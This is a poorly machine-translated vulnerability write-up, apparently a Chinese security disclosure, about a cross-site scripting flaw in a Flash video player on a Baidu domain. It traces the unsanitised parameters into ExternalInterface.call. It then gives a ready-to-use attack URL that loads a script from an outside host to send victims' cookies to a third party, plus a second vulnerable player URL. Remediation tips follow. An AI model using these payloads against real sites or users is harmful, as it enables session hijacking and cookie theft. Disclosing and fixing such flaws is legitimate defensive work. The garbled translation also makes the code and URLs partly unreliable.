Vulnerability program: http://mv.baidu.com/export/flashplayer.swf
Vulnerability code:
1. First, Parameters following FLASH are directly transmitted to Parameters. getInstance (). data.
Parameters. getInstance (). data = loaderInfo. parameters;
2. Then
ExternalInterface. call (Parameters. getInstance (). onPlayStart, _ arg1 );
ExternalInterface. call (Parameters. getInstance (). onPlayStop );
ExternalInterface. call (Parameters. getInstance (). onFileLoadedError );
All three parameters are directly passed into the call for parameters.
3. Continue reading the Parameters class code.
Public function get onPlayStart (): String {
Return (_ data ["onPlayStart"]);
}
Www.2cto.com
4. Therefore, we can construct the following malicious code :? OnPlayStart = function () {alert ('xx')}. The actual code used is:
Http://mv.baidu.com/export/flashplayer.swf? OnFileLoadedError = alert & onPlayPause = alert & autoplay = true & vid = a962554258ba87b54e229f3e & onPlayStart = (function () % 7Blocation. href % 3D 'javascript % 3A % 22% 3 Cscript % 2 Fsrc % 3D % 5C '% 2F % 2Fappmaker.sinaapp.com % 5C % 2Ftest5. js % 5C '% 3E % 3C % 2 Fscript % 3E % 22' % 7D % 29
5. cookies are available. I will not talk much about the rest.
After a user accesses the page, Cookies are sent to a third party.
Solution:
Currently, this cross-site approach does not play a blocking role in browser protection measures. Therefore, as long as the user clicks the link, it is very likely to be recruited.
1. Check whether the full site player is deleted or replaced.
2. You can modify the source code for this player.
In fact, all files such as FLASH should be put in a different domain, such as baiduswf.com, so that even if there is a problem with FLASH, there will not be much impact.
Like a http://www.baidu.com/search/zhidao/badminton/jwplayer/player.swf? Third-party players such as debug = alert should not appear under the primary domain name.
Author gainover